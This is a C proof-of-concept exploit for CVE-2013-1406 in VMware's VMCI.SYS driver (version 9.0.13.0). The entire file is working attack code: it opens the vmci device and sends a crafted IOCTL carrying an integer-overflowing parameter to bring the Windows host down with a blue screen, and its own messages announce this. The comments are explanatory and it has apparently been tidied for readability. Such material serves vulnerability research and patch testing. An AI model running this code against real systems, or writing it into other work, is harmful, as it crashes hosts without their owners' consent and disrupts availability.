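/* This PoC only for version VMCI.SYS 9.0.13.0 */
#include "stdafx.h"
#include "windows.h"

/* Number of int elements in each of the two I/O buffers. */
#define count_massive 0x189
/* IOCTL code sent to the vmci device. */
#define ioctl_vmsock 0x8103208C
/* Value written to inbuf[4]; the original author labels it the
 * integer-overflowing parameter. The original macro carried a trailing ';',
 * which only compiled because the macro was always used as a whole
 * statement — removed here so the macro is usable in any expression. */
#define integer_overflow_size 0x12492492

/*
 * Entry point: opens \\.\vmci, sends one IOCTL with a prepared input
 * buffer and closes the handle. Always returns 0; outcomes are reported
 * on stdout only. argc/argv are unused.
 */
int _tmain(int argc, _TCHAR* argv[])
{
    HANDLE vmci_device;
    DWORD bytesRet = 0;
    int inbuf[count_massive];
    int outbuf[count_massive];
    /* sizeof on the array keeps the byte count tied to the declaration
     * instead of repeating count_massive * sizeof(int). */
    DWORD size_ = (DWORD)sizeof inbuf;

    (void)argc;
    (void)argv;

    printf("**************************************************\r\n");
    printf("[*]0x16/7ton CVE-2013-1406 simple PoC DOS exploit*\r\n");
    printf("**************************************************\r\n");

    /* Open the vmci interface device. dwFlagsAndAttributes is a DWORD,
     * so it gets 0 rather than the NULL the original passed. */
    vmci_device = CreateFileW(L"\\\\.\\vmci", GENERIC_READ,
                              FILE_SHARE_WRITE | FILE_SHARE_READ, NULL,
                              OPEN_EXISTING, 0, NULL);
    if (vmci_device == INVALID_HANDLE_VALUE) {
        printf("[-]Error: Can't open vmci device!\r\n");
        return 0;
    }
    printf("[+]vmci device opened \r\n");

    /* Prepare the input buffer: all zero except the one parameter. */
    memset(inbuf, 0, sizeof inbuf);
    inbuf[4] = integer_overflow_size;

    printf("[+]After delaying we send IOCTL,prepare to BSOD \r\n");
    /* Delaying signed with Diablo stamp :D */
    Sleep(0x29a);
    Sleep(0x1000);

    /* The original discarded the result; report it so a request the
     * driver rejects can be told apart from one it accepted. */
    if (!DeviceIoControl(vmci_device, ioctl_vmsock, inbuf, size_,
                         outbuf, size_, &bytesRet, NULL)) {
        printf("[-]DeviceIoControl failed, error %lu\r\n",
               (unsigned long)GetLastError());
    } else {
        printf("[+]DeviceIoControl returned, %lu bytes\r\n",
               (unsigned long)bytesRet);
    }

    CloseHandle(vmci_device);
    return 0;
}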